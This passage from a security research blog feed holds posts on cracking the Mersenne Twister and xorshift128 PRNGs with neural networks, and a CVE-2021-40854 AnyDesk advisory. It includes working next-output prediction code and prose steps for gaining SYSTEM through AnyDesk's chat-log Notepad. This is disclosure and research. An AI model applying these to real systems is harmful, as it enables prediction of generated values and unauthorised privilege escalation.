As we can see, the number of parameters (weights and biases) of the hidden layer is 21,120 (32×640 weights + 640 biases), and the number of parameters of the output layer is 20,512 (640×32 weights + 32 biases), for a total of 41,632 parameters to train. We can notice that this model is much bigger than the twisting model, as the operations done in tempering are much more complex than those done in twisting. Similarly, the hidden layer activation function is relu, while the output layer activation function is sigmoid, as we expect a binary output. Here is the summary of the model parameters:

Tempering Model
Model Type: Dense Network
#Layers: 2
#Neurons: 672 (Dense)
#Trainable Parameters: 41,632
Activation Functions: Hidden Layer: relu; Output Layer: sigmoid
Loss Function: binary_crossentropy

3.2.3 Model Results

After manual tweaking of the model architecture, we trained a model that achieved 100% bitwise accuracy for both the training and testing sets. To be more confident in this result, we generated a new sample of 1,000,000 states and tempered states using a different seed than those used to generate the previous data. We got the same 100% bitwise accuracy when we tested with this newly generated data.

This means that the model has learned the exact inverse formula that relates each tempered state to its original state. Hence, we can use this model to reverse the generated numbers back to the internal states we need for the first model, use the twisting model to get the new state, and then apply the normal tempering step to get the new output. But before we get to that, let’s do a model deep dive.
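
As a cross-check, the tempering step is also exactly invertible algebraically, which is consistent with the model reaching 100% accuracy. A standard untempering sketch (each helper re-applies the shift until the original word is recovered):

def undo_right(v, shift):
    # invert v ^= v >> shift (32-bit words)
    res = v
    for _ in range(32 // shift + 1):
        res = v ^ (res >> shift)
    return res

def undo_left(v, shift, mask):
    # invert v ^= (v << shift) & mask (32-bit words)
    res = v
    for _ in range(32 // shift + 1):
        res = v ^ ((res << shift) & mask)
    return res & 0xFFFFFFFF

def untemper(y):
    # undo the four tempering steps in reverse order
    y = undo_right(y, 18)
    y = undo_left(y, 15, 0xEFC60000)
    y = undo_left(y, 7, 0x9D2C5680)
    y = undo_right(y, 11)
    return y

# untemper(temper(s)) == s holds for any 32-bit s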

3.2.4 Model Deep Dive

This section deep dives into the model to understand more about what it has learned from the state-relations data and whether it matches our expectations.

3.2.4.1 Model Layers Connections

After training the model, we wanted to test whether any bits are unused or less connected. The following figure shows the weights connecting each input, on the x-axis, to the 640 hidden nodes in the hidden layer (each point represents a hidden node weight):

As we can see, each input bit is connected to many hidden nodes, which implies that each input bit carries more or less the same weight as the others. We also plot, in the following figure, the connections between the hidden layer and the output layer:

The same observation can be made from this figure, except that bits 29 and 30 are perhaps less connected than the others, though they are still well connected to many hidden nodes.

3.2.4.2 The Logic Closed-Form from the State Tempering Model Output

In the same way we did with the first model, we can derive a closed-form logic expression that reverses the tempering, using the model output. But instead of doing so, we can derive a closed-form logic expression that takes the generated numbers at the positions mentioned in the first part, reverses them to the internal states, generates the new state, and then produces the new number, all in one step. So, we plan to connect three copies of the reverse tempering model to one model that generates the new state and then tempers the output to get the newly generated number, as shown in the following figure:

Now we have 3 x 32 input bits and 32 output bits. Using the same approach described before, we can test the effect of each input on each output separately. This shows which input bits affect each bit in the output. The following table shows the input-output relations:

Input Index Input Bits Output Bits
0 0   []
0 1   []
0 2   [1, 8, 12, 19, 26, 30]
0 3   []
0 4   []
0 5   []
0 6   []
0 7   []
0 8   []
0 9   [1, 8, 12, 19, 26, 30]
0 10   []
0 11   []
0 12   []
0 13   []
0 14   []
0 15   []
0 16   [1, 8, 12, 19, 26, 30]
0 17   [1, 8, 12, 19, 26, 30]
0 18   []
0 19   []
0 20   [1, 8, 12, 19, 26, 30]
0 21   []
0 22   []
0 23   []
0 24   [1, 8, 12, 19, 26, 30]
0 25   []
0 26   []
0 27   [1, 8, 12, 19, 26, 30]
0 28   []
0 29   []
0 30   []
0 31   [1, 8, 12, 19, 26, 30]
1 0   [3, 5, 7, 9, 11, 14, 15, 16, 17, 18, 23, 25, 26, 27, 28, 29, 30, 31]
1 1   [0, 4, 7, 22]
1 2   [13, 16, 19, 26, 31]
1 3   [2, 6, 24]
1 4   [0, 3, 7, 10, 18, 25]
1 5   [4, 7, 8, 11, 25, 26]
1 6   [5, 9, 12, 27]
1 7   [5, 7, 9, 10, 11, 14, 15, 16, 17, 18, 21, 23, 25, 26, 27, 29, 30, 31]
1 8   [7, 11, 14, 29]
1 9   [1, 19, 26]
1 10   [9, 13, 31]
1 11   [2, 3, 5, 7, 9, 10, 11, 13, 14, 15, 16, 18, 20, 23, 24, 25, 26, 27, 28, 29, 30, 31]
1 12   [7, 11, 25]
1 13   [1, 9, 12, 19, 27]
1 14   [2, 10, 13, 20, 28]
1 15   [3, 14, 21]
1 16   [1, 8, 12, 15, 19, 26, 30]
1 17   [1, 5, 8, 13, 16, 19, 23, 26, 31]
1 18   [3, 5, 6, 7, 9, 11, 14, 15, 16, 18, 23, 24, 25, 26, 27, 28, 29, 30, 31]
1 19   [4, 18, 22, 25]
1 20   [1, 13, 16, 26, 31]
1 21   [6, 20, 24]
1 22   [0, 2, 3, 5, 6, 9, 11, 13, 14, 15, 16, 17, 20, 21, 23, 26, 27, 29, 30, 31]
1 23   [7, 8, 11, 22, 25, 26]
1 24   [1, 8, 9, 12, 19, 23, 26, 27]
1 25   [5, 6, 7, 9, 10, 11, 13, 14, 15, 16, 17, 18, 21, 23, 24, 25, 26, 27, 29, 30]
1 26   [11, 14, 25, 29]
1 27   [1, 8, 19]
1 28   [13, 27, 31]
1 29   [2, 3, 5, 7, 9, 11, 13, 14, 15, 16, 18, 20, 23, 24, 25, 26, 27, 29, 30, 31]
1 30   [7, 25, 29]
1 31   [8, 9, 12, 26, 27]
2 0   [0]
2 1   [1]
2 2   [2]
2 3   [3]
2 4   [4]
2 5   [5]
2 6   [6]
2 7   [7]
2 8   [8]
2 9   [9]
2 10   [10]
2 11   [11]
2 12   [12]
2 13   [13]
2 14   [14]
2 15   [15]
2 16   [16]
2 17   [17]
2 18   [18]
2 19   [19]
2 20   [20]
2 21   [21]
2 22   [22]
2 23   [23]
2 24   [24]
2 25   [25]
2 26   [26]
2 27   [27]
2 28   [28]
2 29   [29]
2 30   [30]
2 31   [31]

As we can see, each bit in the third input affects the same bit, in order, in the output. Also, we can notice that only 8 bits in the first input affect the output, and they all affect the same 6 output bits. For the second input, however, each bit affects several output bits. Although we could write a closed-form logic expression for this, we will write code instead.

The following code implements a C++ function that can use three generated numbers (at specific locations) to generate the next number:

#include <cstdint>

typedef uint32_t uint; // 32-bit unsigned, as the listing assumes

// Mask table: entry i holds the output bits flipped when bit i of MT_623 is set
uint inp_out_xor_bitsY[32] = {
    0xfe87caa8,
    0x400091,
    0x84092000,
    0x1000044,
    0x2040489,
    0x6000990,
    0x8001220,
    0xeea7cea0,
    0x20004880,
    0x4080002,
    0x80002200,
    0xff95eeac,
    0x2000880,
    0x8081202,
    0x10102404,
    0x204008,
    0x44089102,
    0x84892122,
    0xff85cae8,
    0x2440010,
    0x84012002,
    0x1100040,
    0xecb3ea6d,
    0x6400980,
    0xc881302,
    0x6fa7eee0,
    0x22004800,
    0x80102,
    0x88002000,
    0xef95eaac,
    0x22000080,
    0xc001300
};

uint gen_new_number(uint MT_624, uint MT_623, uint MT_227) {
    uint r = 0;
    uint i = 0;
    // XOR together the mask of every set bit in MT_623 (the second input)
    do {
        r ^= (MT_623 & 1) * inp_out_xor_bitsY[i++];
    }
    while (MT_623 >>= 1);
    
    // Fold the 8 relevant bits of MT_624 into their parity; if odd, apply one more mask
    MT_624 &= 0x89130204;
    MT_624 ^= MT_624 >> 16;
    MT_624 ^= MT_624 >> 8;
    MT_624 ^= MT_624 >> 4;
    MT_624 ^= MT_624 >> 2;
    MT_624 ^= MT_624 >> 1;
    r ^= (MT_624 & 1) * 0x44081102;
    
    // The third input contributes each of its bits unchanged
    r ^= MT_227;
    return r;
}

We tested this code by using the standard MT library in C to generate a sequence of random numbers and matching the output of our function against the next number generated by the library. The output matched 100% across several million generated numbers with different seeds.

3.2.4.3 Further Improvement

We saw in the previous section that we can use three generated numbers to produce the next number in the sequence. But we noticed that we only need 8 bits from the first number, which we XOR together, and only if their parity is one do we XOR the result with the constant 0x44081102. Based on this observation, we can ignore the first number altogether and generate two candidate output values: one without and one with the XOR by 0x44081102. Here is the code segment for the new function:

#include <cstdint>
#include <tuple>

using namespace std;

typedef uint32_t uint; // as in the previous listing

uint inp_out_xor_bitsY[32] = {
    0xfe87caa8,
    0x400091,
    0x84092000,
    0x1000044,
    0x2040489,
    0x6000990,
    0x8001220,
    0xeea7cea0,
    0x20004880,
    0x4080002,
    0x80002200,
    0xff95eeac,
    0x2000880,
    0x8081202,
    0x10102404,
    0x204008,
    0x44089102,
    0x84892122,
    0xff85cae8,
    0x2440010,
    0x84012002,
    0x1100040,
    0xecb3ea6d,
    0x6400980,
    0xc881302,
    0x6fa7eee0,
    0x22004800,
    0x80102,
    0x88002000,
    0xef95eaac,
    0x22000080,
    0xc001300
};

// Returns both candidates for the next number: without and with the parity mask
tuple <uint, uint> gen_new_number(uint MT_623, uint MT_227) {
    uint r = 0;
    uint i = 0;
    do {
        r ^= (MT_623 & 1) * inp_out_xor_bitsY[i++];
    }
    while (MT_623 >>= 1);
    
    r ^= MT_227;
    return make_tuple(r, r ^ 0x44081102);
}

4. Improving MT algorithm

We have shown in the previous sections how to use ML to crack the MT algorithm and use only two or three numbers to predict the next number in the sequence. In this section, we discuss two issues with the MT algorithm and how to improve on them. Studying these issues can be particularly useful when MT is used as part of a cryptographically-secure PRNG, as in CryptMT. CryptMT uses the Mersenne Twister internally, and it was developed by Matsumoto, Nishimura, Mariko Hagita, and Mutsuo Saito [2].

4.1 Normalizing the Runtime

As we described in Section 2, MT consists of two steps: twisting and tempering. Although the tempering step is applied on every call, the twisting step is only used when we exhaust all the states and need to twist the state array into a new internal state. That is fine algorithmically, but from a security point of view it is problematic: it makes the algorithm vulnerable to a timing side-channel attack. In this attack, the attacker can determine when the state is being twisted by monitoring the runtime of each generated number; when it is much longer, the start of a new state can be guessed. The following figure shows an example of the runtime for the first 10,000 generated numbers using MT:

We can clearly see that every 624 iterations, the runtime of the MT algorithm increases significantly due to the state-twisting evaluation. Hence, the attacker can easily determine the start of the state twisting by setting a threshold, around 0.4 ms here, on the runtime of each generated number. Fortunately, this issue can be resolved by updating the internal state every time we generate a new number, using the progressive formula we created earlier. Using this approach, we updated the MT code and measured the runtime again; here is the result:

We can see that the runtime of the algorithm is now uniform across all iterations. Of course, we checked the outputs of both MT implementations, and they produce exactly the same sequences. Also, when we evaluated the mean runtime of both implementations over millions of generated numbers, the new approach turned out to be slightly more efficient and to have a much smaller standard deviation.
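
A sketch of how such per-call timings can be collected (using the MT19937 class sketched in Section 2; absolute timings and the spike threshold depend on the machine):

import time

rng = MT19937(5489)  # the reference sketch from Section 2
timings = []
for _ in range(10_000):
    t0 = time.perf_counter()
    rng.extract_number()
    timings.append(time.perf_counter() - t0)

# calls that trigger the internal twist show up as periodic spikes
mean = sum(timings) / len(timings)
spikes = [i for i, dt in enumerate(timings) if dt > 10 * mean]
print(spikes[:4])  # expect indices 624 apart, e.g. [0, 624, 1248, 1872]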

4.2 Changing the Internal State as a Whole

We showed in the previous section that the MT twist step is equivalent to changing the internal state progressively. This is the main reason we were able to build a machine learning model that can correlate a generated output from MT with three previous outputs. In this section, we suggest changing the algorithm slightly to overcome this weakness. The idea is to apply the twisting step to the old state all at once and generate the new state from it. This can be achieved by performing the twist into a new state array and swapping the new state with the old one after twisting all the states. This makes state prediction more complex, as different states will use different distances when evaluating the new state. For example, all the new states from 0 to 226 will use the old states from 397 to 623, which are 397 apart, and all the new states from 227 to 623 will use the old states from 0 to 396, which are 227 apart. This slight change produces a PRNG more resilient to the attack suggested above, as any generated output can be either 227 or 397 away from the outputs it depends on, and we don't know the position of the generated number (whether it is in the first 227 numbers of the state or in the last 397). Although this will generate a different sequence, predicting the new state from the old ones will be harder. Of course, this suggestion needs to be reviewed more deeply to check the other properties of the resulting PRNG, such as periodicity. A sketch of this double-buffered twist follows.
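
A minimal sketch of the suggested change, reusing the constants from Section 2: the twist writes into a fresh array that only ever reads old values, and the caller swaps the arrays afterwards.

def twist_whole_state(mt, n=624, m=397):
    # every read hits the OLD array, unlike the in-place twist
    new = [0] * n
    for i in range(n):
        x = (mt[i] & 0x80000000) + (mt[(i + 1) % n] & 0x7FFFFFFF)
        xA = x >> 1
        if x & 1:
            xA ^= 0x9908B0DF
        new[i] = mt[(i + m) % n] ^ xA
    return new  # caller swaps: mt = twist_whole_state(mt)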

5. Conclusion

In this series of posts, we have shared the methodology for cracking two well-known (non-cryptographic) pseudo-random number generators, namely xorshift128 and the Mersenne Twister. In the first post, we showed how a simple machine learning model can learn the internal pattern in the sequence of generated numbers. In this post, we extended this work by applying ML techniques to a more complex PRNG. We showed how to split the problem into two simpler problems and trained two different NN models to tackle each one separately. Then we used the two models together to predict the next number in the sequence using three generated numbers. We also showed how to deep dive into the models, understand how they work internally, and use them to create closed-form code that can break the Mersenne Twister (MT) PRNG. At last, we shared two possible techniques to improve the MT algorithm security-wise, as a means of thinking through the algorithmic improvements that can be made based on patterns identified by deep learning (while recognizing that these changes do not themselves constitute sufficient security improvements for MT to be used where cryptographic randomness is required).

The Python code for training and testing the models outlined in this post is shared in this repo in the form of a Jupyter notebook. Please note that this code builds on top of an old version of the code shared in post [3] and the changes made in part 1 of this series.

Acknowledgment

I would like to thank my colleagues at NCC Group for their help and support and for giving valuable feedback, especially on the crypto/cybersecurity parts. Here are a few names that I would like to thank explicitly: Ollie Whitehouse, Jennifer Fernick, Chris Anley, Thomas Pornin, Eric Schorn, and Eli Sohl.

References

[1] Mike Shema, Chapter 7 – Leveraging Platform Weaknesses, Hacking Web Apps, Syngress, 2012, Pages 209-238, ISBN 9781597499514, https://doi.org/10.1016/B978-1-59-749951-4.00007-2.

[2] Matsumoto, Makoto; Nishimura, Takuji; Hagita, Mariko; Saito, Mutsuo (2005). “Cryptographic Mersenne Twister and Fubuki Stream/Block Cipher” (PDF).

[3] Everyone Talks About Insecure Randomness, But Nobody Does Anything About It

AnyDesk Escalation of Privilege (CVE-2021-40854)

18 October 2021 at 09:51

Summary

Assigned CVE: CVE-2021-40854 has been assigned for the report of RedyOps Labs.

Known to Neurosoft’s RedyOps Labs since: 20/07/2021

Exploit Code: N/A

Vendor’s Advisory: https://anydesk.com/cve/2021-40854/

An Elevation of Privilege (EoP) vulnerability exists in AnyDesk for Windows from version 3.1.0 to 6.3.2 (excluding 6.2.6). The vulnerability gives a low-privileged user the ability to gain access as NT AUTHORITY\SYSTEM.

The exploitation took place in an installed version of AnyDesk.

Description

When someone asks to connect to your AnyDesk, the user interface (UI) presented for you to accept the connection and specify the permissions runs as NT AUTHORITY\SYSTEM.

In this same UI, you can open the chat log by pressing “Open Chat Log”. The Notepad window that opens also runs as NT AUTHORITY\SYSTEM.

The escalation from that point is trivial, as presented in the following video.

Exploitation

In order to exploit the issue, no special program is needed.

Video PoC Step By Step


The video is pretty easy to follow.

A low-privileged user opens AnyDesk and performs a connection to his own ID.

In the popup, he opens the “Chat Log”, and from inside Notepad the low-privileged user spawns a cmd.exe as NT AUTHORITY\SYSTEM.

Resources

RedyOps team

The RedyOps team uses the 0-day exploits produced by Research Labs before the vendor releases any patch. They use them in special engagements and only for specific customers.

You can find RedyOps team at https://redyops.com/

Angel

Discovered 0-days that affect the marine sector are communicated to the Angel team. ANGEL has been designed and developed to meet the unique and diverse requirements of the merchant marine sector. It secures the vessel’s business, IoT, and crew networks by providing oversight, security threat alerting, and control of the vessel’s entire network.

You can find Angel team at https://angelcyber.gr/

Illicium

Our 0-days cannot beat Illicium. Today’s information technology landscape is threatened by modern adversary security attacks, including 0-day exploits, polymorphic malware, APTs, and targeted attacks. These threats cannot be identified and mitigated using classic detection and prevention technologies; they can mimic valid user activity, do not have a signature, and do not occur in patterns. In response to attackers’ evolution, defenders now have a new kind of weapon in their arsenal: deception.

You can find Illicium team at https://deceivewithillicium.com/

Neutrify

Discovered 0-days are communicated to the Neutrify team in order to develop related detection rules. Neutrify is Neurosoft’s 24×7 Security Operations Center, completely dedicated to threat monitoring and attack detection. Beyond monitoring, Neutrify offers additional capabilities, including advanced forensic analysis and malware reverse engineering, to analyze incidents.

You can find Neutrify team at https://neurosoft.gr/contact/


Threat Roundup for October 8 to October 15

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 8 and Oct. 15. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics,...


Cracking Random Number Generators using Machine Learning – Part 1: xorshift128

15 October 2021 at 17:29


1. Introduction

This blog post proposes an approach to cracking Pseudo-Random Number Generators (PRNGs) using machine learning. By cracking, we mean that we can predict the sequence of random numbers using previously generated numbers without knowledge of the seed. We started by breaking a simple PRNG, namely xorshift128, following the lead of the post published in [1]. We simplified the structure of the neural network model from the one proposed in that post, and we achieved higher accuracy. This blog aims to show how to train a machine learning model that can reach 100% accuracy in generating random numbers without knowing the seed, and to deep dive into the trained model to show how it worked and to extract useful information from it.

In the mentioned blog post [1], the author replicated the xorshift128 PRNG sequence with high accuracy, without having the PRNG seed, using a deep learning model. After training, the model can use any four consecutive generated numbers to replicate the same sequence of the PRNG with bitwise accuracy greater than 95%. The details of this experiment’s implementation and the best-trained model can be found in [2].

At first glance, this seemed a bit counter-intuitive, as the whole idea behind machine learning algorithms is to learn from patterns in the data to perform a specific task, whether through supervised, unsupervised, or reinforcement learning. Pseudo-random number generators, on the other hand, are meant to generate random sequences, and hence these sequences should not follow any pattern. So, it did not make any sense (at the beginning) to train an ML model, which learns from data patterns, on a PRNG that should not follow any pattern. Yet the model not only learned, it reached 95% bitwise accuracy, which means it generates the PRNG’s exact output and only gets, on average, two bits wrong. So, how is this possible? Why can machine learning crack the PRNG? And can we do even better than 95% bitwise accuracy? That is what we are going to discuss in the rest of this article. Let’s start by examining the xorshift128 algorithm.

** Editor’s Note: How does this relate to security? While this research looks at a non-cryptographic PRNG, we are interested, generically, in understanding how deep learning-based approaches to finding latent patterns within functions presumed to be generating random output could work, as a prerequisite to attempting to use deep learning to find previously-unknown patterns in cryptographic (P)RNGs, as this could potentially serve as an interesting supplementary method for cryptanalysis of these functions. Here, we show our work in beginning to explore this space. **

2. How does xorshift128 PRNG work?

To understand whether machine learning (ML) could crack the xorshift128 PRNG, we need to comprehend how it works and check whether it is following any patterns or not. Let’s start by digging into its implementation of the xorshift128 PRNG algorithm to learn how it works. The code implementation of this algorithm can be found on Wikipedia and shared in [2]. Here is the function that was used in the repo to generate the PRNG sequence (which is used to train the ML model):

def xorshift128():
    '''xorshift128 PRNG
    https://ja.wikipedia.org/wiki/Xorshift
    '''

    # Hardcoded seed: the four 32-bit state variables x, y, z, and w.
    x = 123456789
    y = 362436069
    z = 521288629
    w = 88675123

    def _random():
        nonlocal x, y, z, w
        t = x ^ ((x << 11) & 0xFFFFFFFF)  # keep the shifted x within 32 bits
        x, y, z = y, z, w                 # shift the state: y -> x, z -> y, w -> z
        w = (w ^ (w >> 19)) ^ (t ^ (t >> 8))  # the new w is also the output
        return w

    return _random

As we can see from the code, the implementation is straightforward. It has four internal numbers, x, y, z, and w, representing the seed and the state of the PRNG simultaneously. Of course, we can update this generator implementation to provide the seed with a different function call instead of hardcoding it. Every time we call the generator, it will shift the internal variables as follows: y → x, z → y, and w → z. The new value of w is evaluated by applying some bit manipulations (shifts and XORs) to the old values of x and w. The new w is then returned as the new random number output of the random number generator. Let’s call the function output, o

Using this code, we can derive the logical expression of each bit of the output, which leads us to the following output bits representations of the output, o:

O0 = W0 ^ W19 ^ X0 ^ X8
O1 = W1 ^ W20 ^ X1 ^ X9
...
O31 = W31 ^ X20 ^ X31

where Oi is the ith bit of the output, and the sign ^ is a bitwise XOR. The schematic diagram of this algorithm is shown below:

We can notice from this algorithm that we only need w and x to generate the next random number output. Of course, we need y and z to generate the random numbers afterward, but the value of o depends only on x and w.

So after understanding the algorithm, we can see the simple relation between the last four generated numbers and the next one. Hence, if we know the last four generated numbers from this PRNG, we can use the algorithm to generate the whole sequence; this could be the main reason why this algorithm is not cryptographically secure. Although the algorithm-generated numbers seem to be random with no clear relations between them, an attacker with the knowledge of the algorithm can predict the whole sequence of xorshift128 using any four consecutive generated numbers. As the purpose of this post is to show how an ML model can learn the hidden relations in a sample PRNG, we will assume that we only know that there is some relation between the newly generated number and its last four ones without knowing the implementation of the algorithm.
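To make this relation concrete, here is a small illustrative sketch (ours, not from the referenced repo) that predicts the generator’s next output purely from its last four outputs; predict_next is a hypothetical helper name:

def predict_next(o1, o2, o3, o4):
    # After four calls, the PRNG state (x, y, z, w) is exactly the last
    # four outputs (oldest first), so we can simply replay the recurrence.
    x, w = o1, o4
    t = x ^ ((x << 11) & 0xFFFFFFFF)
    return (w ^ (w >> 19)) ^ (t ^ (t >> 8))

# Example: reproduce the fifth output from the first four.
gen = xorshift128()
outputs = [gen() for _ in range(4)]
assert predict_next(*outputs) == gen()

Of course, the point of this post is to have an ML model learn this mapping on its own, without being told the recurrence.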

Let us now restate the main question slightly: can machine learning algorithms learn to generate the xorshift128 PRNG sequence without knowing its implementation, using only the last four generated numbers as inputs?

To answer this question, let’s first introduce the Artificial Neural Networks (ANN or NN for short) and how they may model the XOR gates.

3. Neural Networks and XOR gates

Neural Networks (NN), aka Multi-Layer Perceptrons (MLP), are one of the most commonly used machine learning algorithms. They consist of small computing units, called neurons or perceptrons, organized into sets of mutually unconnected neurons, called layers. The layers are interconnected to form paths from the inputs of the NN to its outputs. The following figure shows a simple example of a two-layer NN (the input layer is not counted). The details of the mathematical formulation of the NN are out of the scope of this article.

While the NN is trained on the input data, the connections between the neurons, aka the weights, either get stronger (high positive or low negative values) to represent a strong positive/negative connection between two neurons, or get weaker (close to 0) to represent the absence of a connection. At the end of the training, these connections/weights encode the knowledge stored in the NN model.

One example used to describe how NNs handle nonlinear data is the use of an NN to model a two-input XOR gate. The main reason for choosing the two-input XOR function is that although it is simple, its outputs are not linearly separable [3]. Hence, an NN with two layers is the natural way to represent the two-input XOR gate. The following figure (from the Abhranil blog [3]) shows how we can use a two-layer neural network to imitate a two-input XOR. The numbers on the lines are the weights, the numbers inside the nodes are the thresholds (negative biases), and a step activation function is assumed.
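To make this concrete, here is a minimal sketch of a two-layer, step-activation network computing a two-input XOR, using one standard choice of weights and thresholds (which may differ from those in the figure):

import numpy as np

def step(v):
    return (v > 0).astype(int)

W1 = np.array([[1, 1],       # hidden node 1 fires on OR(x1, x2)
               [1, 1]])      # hidden node 2 fires on AND(x1, x2)
b1 = np.array([-0.5, -1.5])  # thresholds 0.5 and 1.5 as negative biases
W2 = np.array([1, -2])       # output fires on "OR but not AND" == XOR
b2 = -0.5

for x in [(0, 0), (0, 1), (1, 0), (1, 1)]:
    h = step(W1 @ np.array(x) + b1)
    print(x, "->", step(W2 @ h + b2))   # prints 0, 1, 1, 0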

In case we have more than two inputs for the XOR, we will need to increase the number of nodes in the hidden layer (the layer in the middle) to make it possible to represent the other components of the XOR.

4. Using Neural Networks to model the xorshift128 PRNG

Based on what we discussed in the previous section and our understanding of how the xorshift128 PRNG algorithm works, it makes sense now that ML can learn the patterns the xorshift128 PRNG algorithm follows. We can also now decide how to structure the neural network model to replicate the xorshift128 PRNG algorithm. More specifically, we will use a dense neural network with only one hidden layer, as that is all we need to represent any set of XOR functions such as those implemented in the xorshift128 algorithm. Contrary to the model suggested in [1], we don’t see any reason to use a complex model like an LSTM (“Long short-term memory,” a type of recurrent neural network), especially since all output bits are directly connected to sets of input bits through XOR functions, as we have shown earlier, and there is no need to preserve internal state, as is done in the LSTM.

4.1 Neural Network Model Design 

Our proposed model would have 128 inputs in the input layer to represent the last four generated integer numbers, 32 bits each, and 32 outputs in the output layer to express the next 32-bit random generated number. The main hyperparameter that we need to decide is the number of neurons/nodes in the hidden layer. We don’t want so few nodes that they cannot represent all the XOR function terms, and at the same time, we don’t want a vast number of nodes that would go unused, complicate the model, and increase the training time. In this case, and based on the number of inputs, outputs, and the complexity of the XOR functions, we made an educated guess and used 1024 nodes for the hidden layer. Hence, our neural network structure is as follows (the input layer is ignored):

_________________________________________________________________
Layer (type)                 Output Shape              Param #   
=================================================================
dense (Dense)                (None, 1024)              132096    
_________________________________________________________________
dense_1 (Dense)              (None, 32)                32800     
=================================================================
Total params: 164,896
Trainable params: 164,896
Non-trainable params: 0
_________________________________________________________________

As we can see, the number of parameters (weights and biases) of the hidden layer is 132,096 (128×1024 weights + 1024 biases), and the number of parameters of the output layer is 32,800 (1024×32 weights + 32 biases), which comes to a total of 164,896 parameters to train. Compare this to the model used in [1]:

_________________________________________________________________
Layer (type)                 Output Shape              Param #   
=================================================================
lstm (LSTM)                  (None, 1024)              4329472   
_________________________________________________________________
dense (Dense)                (None, 512)               524800    
_________________________________________________________________
dense_1 (Dense)              (None, 512)               262656    
_________________________________________________________________
dense_2 (Dense)              (None, 512)               262656    
_________________________________________________________________
dense_3 (Dense)              (None, 512)               262656    
_________________________________________________________________
dense_4 (Dense)              (None, 512)               262656    
_________________________________________________________________
dense_5 (Dense)              (None, 32)                16416     
=================================================================
Total params: 5,921,312
Trainable params: 5,921,312
Non-trainable params: 0
_________________________________________________________________

This complex model has around 6 million parameters to train, which makes training harder and much slower to reach good results. It could also easily get stuck in one of the local minima of that huge 6-million-dimensional space. Additionally, storing this model and serving it later will use about 36 times the space needed to store/serve our model. Furthermore, the number of model parameters affects the amount of data required to train the model; the more parameters, the more input data is needed.

Another issue with that model is the loss function used. Our target is to get as many correct bits as possible; hence, the most suitable loss function in this case is “binary_crossentropy,” not “mse.” Without getting into the math of both loss functions, it is sufficient to say that we don’t care whether the output is 0.8, 0.9, or even 100; all we care about is whether the value crosses some threshold, to be treated as one, or not, to be treated as zero. Another non-optimal parameter choice in that model is the activation function of the output layer. As the output layer comprises 32 neurons, each representing a bit whose value should always be 0 or 1, the most appropriate activation function for such nodes is usually a sigmoid. That model, on the contrary, uses a linear activation function, which can output any value from -inf to inf. Of course, we can threshold those values to convert them to zeros and ones, but training that model will be more challenging and take more time.
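Putting these choices together, the model described here could be declared along the following lines (an illustrative Keras sketch consistent with the text; the optimizer and metric are our assumptions, not taken from the original code):

from tensorflow import keras

model = keras.Sequential([
    keras.layers.Dense(1024, activation="relu", input_shape=(128,)),
    keras.layers.Dense(32, activation="sigmoid"),
])
model.compile(optimizer="adam",              # assumed; not stated in the post
              loss="binary_crossentropy",
              metrics=["binary_accuracy"])
model.summary()   # reproduces the parameter counts shown above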

For the rest of the hyperparameters, we used the same values as the model in [1]. We also used the same input sample as the other model: around 2 million random numbers sampled from the above PRNG function for training, and 10,000 random numbers for testing. The training and testing samples are formed into quadruples of consecutive random numbers to be used as model inputs, with the next random number used as the model output. It is worth mentioning that we don’t think we need that much data to reach the performance we reached; we simply tried to be consistent with the referenced article. Later, we can experiment to determine the minimum data size sufficient to produce a well-trained model. The following table summarises the model parameters/hyperparameters for our model in comparison with the model proposed in [1]:

                       NN Model in [1]                  Our Model
Model Type             LSTM and Dense Network           Dense Network
#Layers                7                                2
#Neurons               1024 LSTM + 2592 Dense           1056 Dense
#Trainable Parameters  5,921,312                        164,896
                       (4,329,472 from the LSTM layer)
Activation Functions   Hidden layers: relu              Hidden layer: relu
                       Output layer: linear             Output layer: sigmoid
Loss Function          mse                              binary_crossentropy

Comparison between our proposed model and the model from the post in [1]
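As a sketch of the data preparation described above (illustrative; the exact bit ordering and windowing in the original repo may differ), each 32-bit output is unpacked into bits, and sliding windows of four consecutive numbers form the inputs:

import numpy as np

def to_bits(n):
    return [(n >> i) & 1 for i in range(32)]   # assumed bit order

gen = xorshift128()
seq = [gen() for _ in range(2_000_000)]

X = np.array([sum((to_bits(seq[i + j]) for j in range(4)), [])
              for i in range(len(seq) - 4)])
y = np.array([to_bits(seq[i + 4]) for i in range(len(seq) - 4)])
# X.shape == (1999996, 128), y.shape == (1999996, 32)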

4.2 Model Results

After a few hours of model training and hyperparameter optimization, the NN model achieved 100% bitwise training accuracy! Of course, we ran the test set through the model and got the same result: 100% bitwise accuracy. To be more confident about what we had achieved, we generated a new sample of 100,000 random numbers with a different seed than the ones used to generate the previous data, and we got the same 100% bitwise accuracy. It is worth mentioning that although the referenced article’s 95%+ bitwise accuracy looks like a promising result, when we evaluated the model accuracy (versus bitwise accuracy), i.e., its ability to generate the exact next random number without any bit flipped, we found that its accuracy dropped to around 26%, compared to 100% for our model. The 95%+ bitwise accuracy does not mean failing on only 2 fixed bits, as it may appear (5% of 32 bits is less than 2 bits); rather, those 5% of errors are scattered across 14 bits. In other words, although the referenced model has 95%+ bitwise accuracy, only 18 bits are always correct, and on average, 2 bits out of the remaining 14 are flipped by the model.

The following table summarizes the two model comparisons:

                                    NN Model in [1]   Our Model
Bitwise Accuracy                    95%+              100%
Accuracy                            26%               100%
Bits that could be flipped (of 32)  14                0

Models accuracy comparison

In machine learning, getting 100% accuracy is usually bad news. It normally means either that we don’t have a good representation of the whole dataset, that we are overfitting the model to the sample data, or that the problem is deterministic and does not need machine learning. In our case, it is closest to the third option. The xorshift128 PRNG algorithm is deterministic; the model needs to learn which input bits are used to generate each output bit, but the function connecting them, XOR, is already known. So, in a way, this algorithm is easy for machine learning to crack. For this problem, getting a 100% accurate model means that the ML model has learned the bit-connection mappings between the input and output bits. Then, given any four consecutive numbers generated by this algorithm, the model will produce the exact same sequence of random numbers as the algorithm does, without knowing the seed.

4.3 Model Deep Dive

This section will deep dive into the model to understand more what it has learned from the PRNG data and if it matches our expectations. 

4.3.1 Model First Layer Connections

